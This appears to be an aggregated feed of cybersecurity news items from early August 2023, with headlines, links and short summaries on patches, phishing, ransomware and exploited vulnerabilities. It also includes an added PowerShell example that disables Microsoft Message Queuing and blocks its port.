            2023-08-08 https://www.bleepingcomputer.com/news/microsoft/microsoft-august-2023-patch-tuesday-warns-of-2-zero-days-87-flaws/
Today is Microsoft's August 2023 Patch Tuesday, with security updates for 87 flaws, including two actively exploited and twenty-three remote code execution vulnerabilities. [...]

Autosummary: The number of bugs in each vulnerability category is listed below:
18 Elevation of Privilege vulnerabilities
3 Security Feature Bypass vulnerabilities
23 Remote Code Execution vulnerabilities
10 Information Disclosure vulnerabilities
8 Denial of Service vulnerabilities
12 Spoofing vulnerabilities
These counts do not include twelve Microsoft Edge (Chromium) vulnerabilities fixed earlier this month.


            Interpol takes down 16shop phishing-as-a-service platform

            financial
            2023-08-08 https://www.bleepingcomputer.com/news/security/interpol-takes-down-16shop-phishing-as-a-service-platform/
A joint operation between Interpol and cybersecurity firms has led to an arrest and shutdown of the notorious 16shop phishing-as-a-service (PhaaS) platform. [...]



            August 2023 Patch Tuesday: Microsoft fixes critical bugs in Teams, MSMQ

            exploits
            2023-08-08 https://www.helpnetsecurity.com/2023/08/08/august-2023-patch-tuesday/

August 2023 Patch Tuesday is here; among the 76 CVE-numbered issues fixed by Microsoft this time around is a DoS vulnerability in .NET and Visual Studio (CVE-2023-38180) for which proof-of-exploit code exists. Other than the fact that a patch is available, practically no other information has been shared by the company about CVE-2023-38180.

Vulnerabilities in Microsoft Office and Exchange Server

There is a Microsoft Office “Defense in Depth Update” available that, according to Microsoft, stops … More


Autosummary: “While MSMQ is not enabled by default and is less common today, any device with it enabled is at critical risk,” noted Automox CISO Jason Kikta, and pointed users towards a Worklet that can help users check to see if the service is enabled and listening on TCP port 1801, stop the service and disable it from starting, and create an inbound firewall block rule for TCP port 1801 to prevent exploitation attacks over the network.
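The check-and-disable procedure Kikta describes, written out as an added PowerShell example. It is not Automox's Worklet and not code from the article; the service name MSMQ (display name "Message Queuing") and the firewall rule name are this example's own assumptions, and the Get-NetTCPConnection and *-NetFirewallRule cmdlets need the NetTCPIP/NetSecurity modules shipped with Windows 8/Server 2012 and later. Run it elevated.

```powershell
# Added example: inspect MSMQ, then stop/disable it and block TCP 1801 inbound.
# Service name "MSMQ" and the rule name below are assumptions, not values from the article.

$svc = Get-Service -Name MSMQ -ErrorAction SilentlyContinue
if (-not $svc) {
    Write-Output "MSMQ service is not installed on this host; nothing to do."
    return
}
Write-Output ("MSMQ service: Status={0} StartType={1}" -f $svc.Status, $svc.StartType)

# Is anything listening on the MSMQ port? Get-NetTCPConnection can return one
# entry per address family (IPv4 and IPv6), so iterate over all of them.
$listeners = @(Get-NetTCPConnection -LocalPort 1801 -State Listen -ErrorAction SilentlyContinue)
foreach ($l in $listeners) {
    $p = Get-Process -Id $l.OwningProcess -ErrorAction SilentlyContinue
    Write-Output ("TCP {0}:1801 LISTEN, PID {1} ({2})" -f $l.LocalAddress, $l.OwningProcess, $p.ProcessName)
}
if ($listeners.Count -eq 0) { Write-Output "Nothing is listening on TCP 1801." }

# Remediation: stop the service, keep it from starting again, and block the port
# at the host firewall so a later re-enable does not silently re-expose it.
if ($svc.Status -ne 'Stopped') { Stop-Service -Name MSMQ -Force }
Set-Service -Name MSMQ -StartupType Disabled

$ruleName = 'Block inbound MSMQ (TCP 1801)'
if (-not (Get-NetFirewallRule -DisplayName $ruleName -ErrorAction SilentlyContinue)) {
    New-NetFirewallRule -DisplayName $ruleName -Direction Inbound -Protocol TCP `
        -LocalPort 1801 -Action Block -Profile Any | Out-Null
}
Write-Output "MSMQ stopped and disabled; inbound TCP 1801 blocked by rule '$ruleName'."
```

The firewall rule is deliberately kept alongside the disabled service: a stopped service is one Set-Service away from listening again, while the block rule survives that. Where a host does not need Message Queuing at all, removing the Windows feature (Disable-WindowsOptionalFeature -Online -FeatureName MSMQ-Server) is the smaller attack surface; wherever MSMQ must stay enabled, the Patch Tuesday update itself is still required.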


            Digital assets continue to be prime target for malvertisers

            ransomware
            2023-08-08 https://www.malwarebytes.com/blog/threat-intelligence/2023/08/digital-assets-continue-to-be-prime-target-for-malvertisers

Categories: Threat Intelligence

Tags: malvertising, nft, crypto, wallet, bing, google

            NFT enthusiasts are getting their wallets drained after clicking on a malicious ad.

            The post Digital assets continue to be prime target for malvertisers appeared first on Malwarebytes Labs.

            "

Autosummary: They are redirected to a second website (www-market-lookshare[.]com) that was also registered very recently and that acts as the phishing site. This site is a close replica of the official looksrare[.]org domain. Draining wallets: the phishing site invites victims to connect their wallet by scanning a QR code. If you are running the Coinbase extension, you will get a connection request from the site. After connecting to the victim's wallet, the threat actor will run a few queries and eventually prompt the user to sign a message, granting them access to their NFTs.


            PSNI: Major data breach identifies thousands of officers and civilian staff

            financial
            2023-08-08 https://www.bbc.co.uk/news/uk-northern-ireland-66445452?at_medium=RSS&at_campaign=KARANGA
A top officer apologises for the breach affecting police and employees in Northern Ireland.



            Zoom CISO Michael Adams discusses cybersecurity threats, solutions, and the future

            ciber
            2023-08-07 https://www.helpnetsecurity.com/2023/08/07/michael-adams-zoom-ciso-cybersecurity/

            In this Help Net Security interview, we delve into the world of cybersecurity with Michael Adams, the CISO at Zoom. Adams analyzes how organizations grapple with the effects of workforce shortages and remote work complications, offering insights into best practices for safeguarding products and services in this challenging era. As a result of the Great Resignation, many organizations are dealing with workforce shortages and the challenges of remote work. Can you elaborate on how these … More


Autosummary: As with any emerging threat vector, organizations need to have solid defenses in place, including anti-phishing software, MFA, and endpoint detection. For companies seeking to address a workforce shortage, it’s crucial to invest in automated threat detection systems, adopt flexible yet secure technologies, and encourage continuous learning among existing staff.


            Budget constraints threaten cybersecurity in government bodies

            government ciber
            2023-08-07 https://www.helpnetsecurity.com/2023/08/07/government-services-cyberattacks/

Government organizations are attractive targets for threat actors whose motivations may be geopolitical, financial, or disruption, according to BlackBerry. Because threat actors may include private individuals, small groups, or state-sponsored APT groups, government organizations must defend against a wide range of threats.

Governments and public services under cyberattacks

With limited resources and often immature cyber defense programs, these publicly funded organizations are struggling against the double-pronged threat of attacks from both … More



            Navigating the gray zone of ransomware payment practices

            exploits ransomware
            2023-08-07 https://www.helpnetsecurity.com/2023/08/07/ransomware-payment-practices-video/

            Ransomware remains a lucrative tool for cybercriminals as attackers continue to target a wide array of businesses. In response to this growing threat, an increasing number of organizations are compelled to meet ransom demands, perceiving it as their only viable course of action. In this Help Net Security video, Jordan Schroeder, Managing CISO at Barrier Networks, discusses ransomware payment practices.



            8 free cybersecurity documentaries you can watch right now

            ciber
            2023-08-07 https://www.helpnetsecurity.com/2023/08/07/free-cybersecurity-documentaries/

The line between physical and digital safety continues to blur, making cybersecurity a universal concern. The intricacies of cybersecurity can often feel esoteric, leaving many outside the industry feeling daunted. However, with increasing resources becoming available, getting a handle on cybersecurity is more attainable than ever before. Here’s a list of eight free cybersecurity documentaries that shine a light on cybercrime and the digital defense industry.

A hacker shares his biggest fears (2021)

A white … More


Autosummary: Look behind the cheerful veneer of social media, communication apps, and platforms that have made our lives easier and more connected, and you’ll find criminals using the same apps and platforms to run illicit and dangerous activities.


            FBI Alert: Crypto Scammers are Masquerading as NFT Developers

            financial
            2023-08-07 https://thehackernews.com/2023/08/fbi-alert-crypto-scammers-are.html
The U.S. Federal Bureau of Investigation (FBI) is warning about cyber crooks masquerading as legitimate non-fungible token (NFT) developers to steal cryptocurrency and other digital assets from unsuspecting users. In these fraudulent schemes, criminals either obtain direct access to NFT developer social media accounts or create look-alike accounts to promote "exclusive" new NFT releases, often [...]

            Autosummary: "Criminals coach victims through the investment process, show them fake profits, and encourage victims to invest more," the FBI said. "


            PaperCut fixes bug that can lead to RCE, patch quickly! (CVE-2023-39143)

            exploits
            2023-08-07 https://www.helpnetsecurity.com/2023/08/07/cve-2023-39143/

            Horizon3.ai researchers have published some details (but no PoC for now, thankfully!) about CVE-2023-39143, two vulnerabilities in PaperCut application servers that could be exploited by unauthenticated attackers to execute code remotely. But, they noted, unlike the PaperCut vulnerability (CVE-2023-27350) recently leveraged by Clop and LockBit ransomware affiliates, CVE-2023-39143 is not a “one-shot” RCE bug. “CVE-2023-39143 is more complex to exploit, involving multiple issues that must be chained together to compromise a server,” they pointed out. … More



            New SkidMap Redis Malware Variant Targeting Vulnerable Redis Servers

            exploits
            2023-08-07 https://thehackernews.com/2023/08/new-skidmap-redis-malware-variant.html
Vulnerable Redis services have been targeted by a "new, improved, dangerous" variant of a malware called SkidMap that's engineered to target a wide range of Linux distributions. "The malicious nature of this malware is to adapt to the system on which it is executed," Trustwave security researcher Radoslaw Zdonczyk said in an analysis published last week. Some of the Linux distribution SkidMap [...]



            North Korean hackers "ScarCruft" breached Russian missile maker

            rusia-ucrania
            2023-08-07 https://www.bleepingcomputer.com/news/security/north-korean-hackers-scarcruft-breached-russian-missile-maker/
The North Korean state-sponsored hacking group ScarCruft has been linked to a cyberattack on the IT infrastructure and email server for NPO Mashinostroyeniya, a Russian space rocket designer and intercontinental ballistic missile engineering organization. [...]

Autosummary: The backdoor supports a total of 25 commands, including reconnaissance: file and process attribute enumeration, scanning hosts in IP ranges for open TCP ports, and ICMP-pinging them for availability.


            New Malware Campaign Targets Inexperienced Cyber Criminals with OpenBullet Configs

            exploits
            2023-08-07 https://thehackernews.com/2023/08/new-malware-campaign-targets.html
A new malware campaign has been observed making use of malicious OpenBullet configuration files to target inexperienced cyber criminals with the goal of delivering a remote access trojan (RAT) capable of stealing sensitive information. Bot mitigation company Kasada said the activity is designed to "exploit trusted criminal networks," describing it as an instance of advanced threat actors [...]

Autosummary: Targeted browsers and crypto wallets include Brave, Google Chrome, Microsoft Edge, Opera, Opera GX, Opera Crypto, Yandex Browser, Atomic, Dash Core, Electron Cash, Electrum, Electrum-LTC, Ethereum Wallet, Exodus, Jaxx Liberty, Litecoin Wallet, and Mincoin.


            North Korean Hackers Targets Russian Missile Engineering Firm

            rusia-ucrania
            2023-08-07 https://thehackernews.com/2023/08/north-korean-hackers-targets-russian.html
Two different North Korean nation-state actors have been linked to a cyber intrusion against the major Russian missile engineering company NPO Mashinostroyeniya. Cybersecurity firm SentinelOne said it identified "two instances of North Korea related compromise of sensitive internal IT infrastructure," including a case of an email server compromise and the deployment of a Windows backdoor dubbed [...]



            2022"s most routinely exploited vulnerabilities—history repeats

            exploits
            2023-08-07 https://www.malwarebytes.com/blog/news/2023/08/the-2022-top-routinely-exploited-vulnerabilities-history-repeats

Categories: Exploits and vulnerabilities, News

Tags: Zoho ManageEngine, CVE-2021-40539, Log4Shell, CVE-2021-44228, CVE-2021-13379, ProxyShell, CVE-2021-34473, CVE-2021-31207, CVE-2021-34523, CVE-2021-26084, Atlassian, CVE-2022-22954, CVE-2022-22960, CVE-2022-26134, CVE-2022-1388, CVE-2022-30190, Follina

What can the routinely exploited vulnerabilities of 2022 tell us, and what do we think will make it on to next year's list?


Autosummary: CVE-2022-22954 and CVE-2022-22960 are two vulnerabilities that can be chained to allow remote code execution (RCE), privilege escalation, and authentication bypass in VMware Workspace ONE Access, Identity Manager, and other VMware products. ProxyShell is a combination of three vulnerabilities in Microsoft Exchange Server (CVE-2021-34473, CVE-2021-31207, and CVE-2021-34523) that can be chained together to allow a remote attacker to break in, take control, and then do bad things on an unpatched server.


            Google Gmail continuously nagging to enable Enhanced Safe Browsing

            ransomware
            2023-08-06 https://www.bleepingcomputer.com/news/google/google-gmail-continuously-nagging-to-enable-enhanced-safe-browsing/
Google is urging users to activate its Enhanced Safe Browsing feature via numerous alerts in Gmail that keep coming back, even after you acknowledge them. [...]

Autosummary: If you are sick of the warnings or just want better security, even though you may have reduced privacy, you can enable the feature by following these steps: Open your Google Account.


            Researchers Uncover New High-Severity Vulnerability in PaperCut Software

            exploits
            2023-08-05 https://thehackernews.com/2023/08/researchers-uncover-new-high-severity.html
Cybersecurity researchers have discovered a new high-severity security flaw in PaperCut print management software for Windows that could result in remote code execution under specific circumstances. Tracked as CVE-2023-39143 (CVSS score: 8.4), the flaw impacts PaperCut NG/MF prior to version 22.1.3. It has been described as a combination of a path traversal and file upload vulnerability.



            Reptile Rootkit: Advanced Linux Malware Targeting South Korean Systems

            exploits
            2023-08-05 https://thehackernews.com/2023/08/reptile-rootkit-advanced-linux-malware.html
Threat actors are using an open-source rootkit called Reptile to target Linux systems in South Korea. "Unlike other rootkit malware that typically only provide concealment capabilities, Reptile goes a step further by offering a reverse shell, allowing threat actors to easily take control of systems," the AhnLab Security Emergency Response Center (ASEC) said in a report published this week. "Port [...]

            Autosummary: "Reptile is a Linux kernel mode rootkit malware that provides a concealment feature for files, directories, processes, and network communications," ASEC said. "


            Colorado Department of Higher Education warns of massive data breach

            financial
            2023-08-05 https://www.bleepingcomputer.com/news/security/colorado-department-of-higher-education-warns-of-massive-data-breach/
The Colorado Department of Higher Education (CDHE) discloses a massive data breach impacting students, past students, and teachers after suffering a ransomware attack in June. [...]

Autosummary: The stolen information includes full names, social security numbers, dates of birth, addresses, proof of addresses (statements/bills), photocopies of government IDs, and for some, police reports or complaints regarding identity theft.


            Clop ransomware now uses torrents to leak data and evade takedowns

            exploits ransomware
            2023-08-05 https://www.bleepingcomputer.com/news/security/clop-ransomware-now-uses-torrents-to-leak-data-and-evade-takedowns/
The Clop ransomware gang has once again altered extortion tactics and is now using torrents to leak data stolen in MOVEit attacks. [...]

Autosummary: According to security researcher Dominic Alvieri, who first spotted this new tactic, torrents have been created for twenty victims, including Aon, K & L Gates, Putnam, Delaware Life, Zurich Brazil, and Heidelberg.


            The direct impact of cyberattacks on patient safety and care delivery

            ciber
            2023-08-04 https://www.helpnetsecurity.com/2023/08/04/omar-sangurima-healthcare-organizations-cybersecurity-challenges/

            As the healthcare industry continues its rapid transformation through the adoption of digital technologies, it is also confronted with an ever-expanding range of cybersecurity threats. In this Help Net Security interview, Dr. Omar Sangurima, Principal Technical Program Manager at Memorial Sloan Kettering Cancer Center, discusses the impact of cyberattacks on patient safety and care delivery, emphasizing how disruptions to critical healthcare services can harm patients and even lead to life-threatening situations. Can you discuss the … More


Autosummary: For example, when a healthcare organization is hit with a cyberattack, the attackers may gain access to sensitive patient data, including personal information, medical histories, and even financial information. In a word, visibility, or lack thereof, leads to a lack of control over the organization’s security environment, making it challenging to identify and respond to threats in a timely manner. However, these are sadly exceedingly rare, and what we are left with in most cases are instances where there was absolutely something an organization could have done to mitigate a breach, or at the very least, lessen the impact when one occurred.


            Major Cybersecurity Agencies Collaborate to Unveil 2022"s Most Exploited Vulnerabilities

            exploits ciber
            2023-08-04 https://thehackernews.com/2023/08/major-cybersecurity-agencies.html
A four-year-old critical security flaw impacting Fortinet FortiOS SSL has emerged as one of the most routinely and frequently exploited vulnerabilities in 2022. "In 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems," cybersecurity and intelligence agencies from the Five [...]



            Ransomware attacks cost manufacturing sector $46 billion in downtime since 2018, report claims

            exploits industry
            2023-08-04 https://www.tripwire.com/state-of-security/ransomware-attacks-cost-manufacturing-sector-46-billion-downtime-2018-report
Newly-released research reveals the eye-watering costs that the manufacturing sector has suffered in recent years at the hands of ransomware. Read more in my article on the Tripwire State of Security blog.



            Attackers use dynamic code loading to bypass Google Play store’s malware detections

            exploits
            2023-08-04 https://securityaffairs.com/149150/hacking/google-play-malware-versioning-evasion.html

            Threat actors rely on the ‘versioning’ technique to evade malware detections of malicious code uploaded to the Google Play Store. Google Cybersecurity Action Team (GCAT) revealed that threat actors are using a technique called versioning to evade malware detection implemented to detect malicious code uploaded to the Google Play Store. The technique is not new […]

            The post Attackers use dynamic code loading to bypass Google Play store’s malware detections appeared first on Security Affairs.

            "

            Autosummary: Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, malware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "


            CISA, FBI, and NSA published the list of 12 most exploited vulnerabilities of 2022

            exploits
            2023-08-04 https://securityaffairs.com/149141/security/14914112-most-exploited-vulnerabilities-2022.html

            CISA, the FBI, and NSA, along with Five Eyes cybersecurity agencies published a list of the 12 most exploited vulnerabilities of 2022. CISA, the NSA, and the FBI, in collaboration with cybersecurity authorities from Australia, Canada, New Zealand, and the United Kingdom, have published a list of the 12 most exploited vulnerabilities of 2022. The […]



            Extended warranty robocallers fined $300 million after 5 billion scam calls

            financial
            2023-08-04 https://www.bleepingcomputer.com/news/security/extended-warranty-robocallers-fined-300-million-after-5-billion-scam-calls/
The Federal Communications Commission (FCC) has announced a record-breaking $299,997,000 fine imposed on an international network of companies for placing five billion robocalls to more than 500 million phone numbers over three months in 2021. [...]



            Top 12 vulnerabilities routinely exploited in 2022

            exploits
            2023-08-04 https://www.helpnetsecurity.com/2023/08/04/2022-exploited-vulnerabilities/

Cybersecurity agencies from member countries of the Five Eyes intelligence alliance have released a list of the top 12 vulnerabilities routinely exploited in 2022, plus 30 additional ones also “popular” with attackers.

The top 12

“In 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems. Proof of concept (PoC) code was publicly available for many of the software vulnerabilities or vulnerability chains, likely facilitating exploitation … More



            NYC Couple Pleads Guilty to Money Laundering in $3.6 Billion Bitfinex Hack

            financial
            2023-08-04 https://thehackernews.com/2023/08/nyc-couple-pleads-guilty-to-money.html
A married couple from New York City has pleaded guilty to money laundering charges in connection with the 2016 hack of cryptocurrency exchange Bitfinex, resulting in the theft of about 120,000 bitcoin. The development comes more than a year after Ilya Lichtenstein, 35, and his wife, Heather Morgan, 33, were arrested in February 2022, following the seizure of roughly 95,000 of the stolen [...]

Autosummary: The development comes more than a year after Ilya Lichtenstein, 35, and his wife, Heather Morgan, 33, were arrested in February 2022, following the seizure of roughly 95,000 of the stolen crypto assets that were held by the defendants.


            New PaperCut critical bug exposes unpatched servers to RCE attacks

            exploits
            2023-08-04 https://www.bleepingcomputer.com/news/security/new-papercut-critical-bug-exposes-unpatched-servers-to-rce-attacks/
PaperCut recently fixed a critical security vulnerability in its NG/MF print management software that allows unauthenticated attackers to gain remote code execution on unpatched Windows servers. [...]



            FBI warns of scammers posing as NFT devs to steal your crypto

            financial
            2023-08-04 https://www.bleepingcomputer.com/news/security/fbi-warns-of-scammers-posing-as-nft-devs-to-steal-your-crypto/
The FBI warned today of fraudsters posing as Non-Fungible Token (NFT) developers to prey upon NFT enthusiasts and steal their cryptocurrency and NFT assets. [...]

Autosummary: When filing a complaint, victims are encouraged to provide crucial details, including links, social media accounts, crypto accounts, or domains associated with the scam, and to include the NFTHack keyword to make it easier to keep track of reports linked to this type of scam.


            Google explains how Android malware slips onto Google Play Store

            exploits
            2023-08-04 https://www.bleepingcomputer.com/news/security/google-explains-how-android-malware-slips-onto-google-play-store/
The Google Cloud security team acknowledged a common tactic known as versioning used by malicious actors to slip malware on Android devices after evading the Google Play Store's review process and security controls. [...]

Autosummary: Additionally, apps published on the official Android app store are strictly prohibited from downloading executable code (such as DEX, JAR, or .so files) from external sources.


            Microsoft Teams used in phishing campaign to bypass multi-factor authentication

            financial
            2023-08-04 https://www.malwarebytes.com/blog/news/2023/08/microsoft-teams-used-in-phishing-campaign-to-bypass-multi-factor-authentication

Categories: Business, News

Tags: Microsoft Teams, social engineering, bypass, MFA, authenticator

Attackers are using Microsoft Teams chats from compromised Microsoft 365 tenants as credential theft phishing lures.


Autosummary: The targeted organizations are mostly found among government, non-government organizations (NGOs), IT services, technology, discrete manufacturing, and media sectors. According to Microsoft the attackers are part of the same group that was behind the attacks against SolarWinds, the Sunburst backdoor, TEARDROP malware, GoldMax malware, and other related components. In the phishing attacks the group leverages previously compromised Microsoft 365 instances, mostly owned by small businesses, to create new domains that look like technical support accounts.


            A cyberattack impacted operations of multiple hospitals in several US states

            government ciber
            2023-08-04 https://securityaffairs.com/149181/hacking/cyberattack-impacted-multiple-us-hospitals.html

            A cyberattack has disrupted the computer systems of multiple hospitals in several states, with a severe impact on their operations. Some emergency rooms in multiple hospitals in several states were forced to close and ambulances were diverted due to a cyberattack against their networks. The cyberattack hit hospitals operated by Prospect Medical Holdings, which are […]

            The post A cyberattack impacted operations of multiple hospitals in several US states appeared first on Security Affairs.

            "

            Autosummary: Officials confirmed that a malware infected some systems of the hospital’s IT infrastructure. Pierluigi Paganini (SecurityAffairs – hacking, Hospitals) "


            The Week in Ransomware - August 4th 2023 - Targeting VMware ESXi

            exploits ransomware
            2023-08-04 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-4th-2023-targeting-vmware-esxi/
            Ransomware gangs continue to prioritize targeting VMware ESXi servers, with almost every active ransomware gang creating custom Linux encryptors for this purpose. [...] "

            Autosummary: Contributors and those who provided new ransomware information and stories this week include: @billtoulas, @Seifreed, @malwrhunterteam, @demonslay335, @serghei, @malwareforme, @LawrenceAbrams, @BleepinComputer, @Ionut_Ilascu, @Fortinet, @malvuln, @Intel_by_KELA, @DragosInc, @MrJamesSullivan, @pcrisk, and @juanbrodersen. Other ransomware operations with ESXi encryptors include Akira, Royal, Black Basta, LockBit, BlackMatter, AvosLocker, REvil, HelloKitty, RansomEXX, and Hive. "


            How local governments can combat cybercrime

            government
            2023-08-03 https://www.helpnetsecurity.com/2023/08/03/how-local-governments-combat-cybercrime-video/

            Amid a recent uptick in cybercrime on local governments, cities have been left to recover for months after the initial attack. For example, leaders in Dallas, Texas are ready to spend months recovering from an attack that hindered the city’s 911 emergency services, court systems, and more. As more local governments have adopted cloud technology, more entry points have opened up for bad actors to attack. In this Help Net Security video, Ben Sebree, Senior … More

            The post How local governments can combat cybercrime appeared first on Help Net Security.

            "

            Autosummary: "


            Google’s AI Red Team: Advancing cybersecurity on the AI frontier

            ciber
            2023-08-03 https://www.helpnetsecurity.com/2023/08/03/daniel-fabian-google-ai-red-team/

            With the rise of ML, traditional red teams tasked with probing and exposing security vulnerabilities found themselves facing a new set of challenges that required a deep and comprehensive understanding of machine learning. Google’s recent announcement about the formation of a dedicated AI Red Team has raised curiosity and interest within the tech community. In this Help Net Security interview, Daniel Fabian, Head of Google Red Teams, shares insights into the significance of his team, … More

            The post Google’s AI Red Team: Advancing cybersecurity on the AI frontier appeared first on Help Net Security.

            "

            Autosummary: In this Help Net Security interview, Daniel Fabian, Head of Google Red Teams, shares insights into the significance of his team, the challenges they face, and the impact they are making in securing AI-driven technologies. At the beginning of an exercise, the AI red team sets up a scenario, describing who the simulated attacker is, what their capabilities are, and what goals they would like to achieve. "


            Microsoft Exposes Russian Hackers' Sneaky Phishing Tactics via Microsoft Teams Chats

            financial industry rusia-ucrania
            2023-08-03 https://thehackernews.com/2023/08/microsoft-exposes-russian-hackers.html
            Microsoft on Wednesday disclosed that it identified a set of highly targeted social engineering attacks mounted by a Russian nation-state threat actor using credential theft phishing lures sent as Microsoft Teams chats. The tech giant attributed the attacks to a group it tracks as Midnight Blizzard (previously Nobelium). It's also called APT29, BlueBravo, Cozy Bear, Iron Hemlock, and The Dukes. "

            Autosummary: " Microsoft said the campaign, observed since at least late May 2023, affected less than 40 organizations globally spanning government, non-government organizations (NGOs), IT services, technology, discrete manufacturing, and media sectors. "


            Researchers Discover Bypass for Recently Patched Critical Ivanti EPMM Vulnerability

            exploits
            2023-08-03 https://thehackernews.com/2023/08/researchers-discover-bypass-for.html
            Cybersecurity researchers have discovered a bypass for a recently fixed actively exploited vulnerability in some versions of Ivanti Endpoint Manager Mobile (EPMM), prompting Ivanti to urge users to update to the latest version of the software. Tracked as CVE-2023-35082 (CVSS score: 10.0) and discovered by Rapid7, the issue "allows unauthenticated attackers to access the API in older unsupported "

            Autosummary: "


            Russian APT phished government employees via Microsoft Teams

            government rusia-ucrania
            2023-08-03 https://www.helpnetsecurity.com/2023/08/03/microsoft-teams-phishing/

            An APT group linked to Russia’s Foreign Intelligence Service has hit employees of several dozen global organizations with phishing attacks via Microsoft Teams, says Microsoft. A social engineering attack to bypass MFA protection “To facilitate their attack, the actor uses Microsoft 365 tenants owned by small businesses they have compromised in previous attacks to host and launch their social engineering attack. The actor renames the compromised tenant, adds a new onmicrosoft.com subdomain, then adds a … More

            The post Russian APT phished government employees via Microsoft Teams appeared first on Help Net Security.

            "

            Autosummary: Microsoft says that the targets in this campaign were government and non-government organizations, and organizations in the IT services, technology, discrete manufacturing, and media sectors. "


            Ivanti discloses another vulnerability in MobileIron Core (CVE-2023-35082)

            exploits
            2023-08-03 https://www.helpnetsecurity.com/2023/08/03/cve-2023-35082/

            Ivanti has disclosed a critical vulnerability (CVE-2023-35082) affecting old, out-of-support versions of MobileIron Core, an enterprise device solution that has since been rebranded to Ivanti Endpoint Manager Mobile (EPMM). “The vulnerability was incidentally resolved in MobileIron Core 11.3 as part of work on a product bug. It had not previously been identified as a vulnerability,” noted Ivanti. About the vulnerability (CVE-2023-35082): CVE-2023-35082 is a remote unauthenticated API access vulnerability that, if exploited, could allow an … More

            The post Ivanti discloses another vulnerability in MobileIron Core (CVE-2023-35082) appeared first on Help Net Security.

            "

            Autosummary: "


            Microsoft Flags Growing Cybersecurity Concerns for Major Sporting Events

            ciber
            2023-08-03 https://thehackernews.com/2023/08/microsoft-flags-growing-cybersecurity.html
            Microsoft is warning of the threat malicious cyber actors pose to stadium operations, warning that the cyber risk surface of live sporting events is "rapidly expanding." "Information on athletic performance, competitive advantage, and personal information is a lucrative target," the company said in a Cyber Signals report shared with The Hacker News. "Sports teams, major league and global "

            Autosummary: "


            "Mysterious Team Bangladesh" Targeting India with DDoS Attacks and Data Breaches

            financial
            2023-08-03 https://thehackernews.com/2023/08/mysterious-team-bangladesh-targeting.html
            A hacktivist group known as Mysterious Team Bangladesh has been linked to over 750 distributed denial-of-service (DDoS) attacks and 78 website defacements since June 2022. "The group most frequently attacks logistics, government, and financial sector organizations in India and Israel," Singapore-headquartered cybersecurity firm Group-IB said in a report shared with The Hacker News. "The group is "

            Autosummary: Its LinkedIn profile lists "Operation Israel" as an ongoing project since June 2022, claiming it supports Palestine, that the "Israeli Government killing & torturing Palestine people's," and that "we will attacking their cyberspace until they stop killing Palestine People's. "


            Hackers can abuse Microsoft Office executables to download malware

            exploits
            2023-08-03 https://www.bleepingcomputer.com/news/security/hackers-can-abuse-microsoft-office-executables-to-download-malware/
            The list of LOLBAS files - legitimate binaries and scripts present in Windows that can be abused for malicious purposes - will include the main executables for Microsoft's Outlook email client and Access database management system. [...] "

            Autosummary: Microsoft Office executable files (source: Pentera). He tested all of them manually and found three - MsoHtmEd.exe, MSPub.exe, and ProtocolHandler.exe - that could be used as downloaders for third-party files, thus fitting the LOLBAS criteria. Microsoft Office binaries: The LOLBAS project currently lists over 150 Windows-related binaries, libraries, and scripts that can help attackers execute or download malicious files or bypass lists of approved programs. "


            FBI, CISA, and NSA reveal top exploited vulnerabilities of 2022

            exploits
            2023-08-03 https://www.bleepingcomputer.com/news/security/fbi-cisa-and-nsa-reveal-top-exploited-vulnerabilities-of-2022/
            In collaboration with CISA, the NSA, and the FBI, Five Eyes cybersecurity authorities have issued today a list of the 12 most exploited vulnerabilities throughout 2022. [...] "

            Autosummary: Microsoft Exchange Server Elevation of Privilege; CVE-2021-40539 Zoho ADSelfService Plus RCE/Auth Bypass; CVE-2021-26084 Atlassian Confluence Server/Data Center Arbitrary code execution; CVE-2021-44228 (Log4Shell) Apache Log4j2 RCE; CVE-2022-22954 VMware Workspace ONE RCE; CVE-2022-22960 VMware Workspace ONE Improper Privilege Management; CVE-2022-1388 F5 Networks BIG-IP Missing Authentication; CVE-2022-30190 Microsoft Multiple Products RCE; CVE-2022-26134 Atlassian Confluence Server/Data Center RCE. The first spot goes to CVE-2018-13379, a Fortinet SSL VPN vulnerability the company fixed four years ago, in May 2019. "


            Chrome malware Rilide targets enterprise users via PowerPoint guides

            exploits
            2023-08-03 https://www.bleepingcomputer.com/news/security/chrome-malware-rilide-targets-enterprise-users-via-powerpoint-guides/
            The malicious Rilide Stealer Chrome browser extension has returned in new campaigns targeting crypto users and enterprise employees to steal credentials and crypto wallets. [...] "

            Autosummary: One campaign targets multiple banks, payment providers, email service providers, crypto exchange platforms, VPNs, and cloud service providers, using injection scripts, mainly focusing on users in Australia and the United Kingdom. Infection chains for three Rilide campaigns (source: Trustwave). Regardless of the distribution campaign, upon installation, the extension communicates with the attackers' server and receives one of the following commands: extension – Enable or disable an extension from list of installed extensions. Rilide is a malicious browser extension for Chromium-based browsers, including Chrome, Edge, Brave, and Opera, that Trustwave SpiderLabs initially discovered in April 2023. "


            New Version of Rilide Data Theft Malware Adapts to Chrome Extension Manifest V3

            exploits
            2023-08-03 https://thehackernews.com/2023/08/new-version-of-rilide-data-theft.html
            Cybersecurity researchers have discovered a new version of malware called Rilide that targets Chromium-based web browsers to steal sensitive data and steal cryptocurrency. "It exhibits a higher level of sophistication through modular design, code obfuscation, adoption to the Chrome Extension Manifest V3, and additional features such as the ability to exfiltrate stolen data to a Telegram channel "

            Autosummary: "


            Hacktivists fund their operations using common cybercrime tactics

            industry
            2023-08-03 https://www.bleepingcomputer.com/news/security/hacktivists-fund-their-operations-using-common-cybercrime-tactics/
            Hacktivist groups that operate for political or ideological motives employ a broad range of funding methods to support their operations. [...] "

            Autosummary: Finally, Killnet has attempted to extort victims into paying ransom to stop DDoS attacks or delete stolen data, like in the case of RuTor in August 2022, BlackSprut in November 2022, the Latvian government in November 2022, and NATO in April 2023. Killnet set up a hack-for-hire service in March 2023, announced a new DDoS-for-hire service in July 2023, and launched a "Dark School" training program selling nine hacking courses to interested hackers in May 2023. "


            US govt contractor Serco discloses data breach after MoveIT attacks

            financial
            2023-08-03 https://www.bleepingcomputer.com/news/security/us-govt-contractor-serco-discloses-data-breach-after-moveit-attacks/
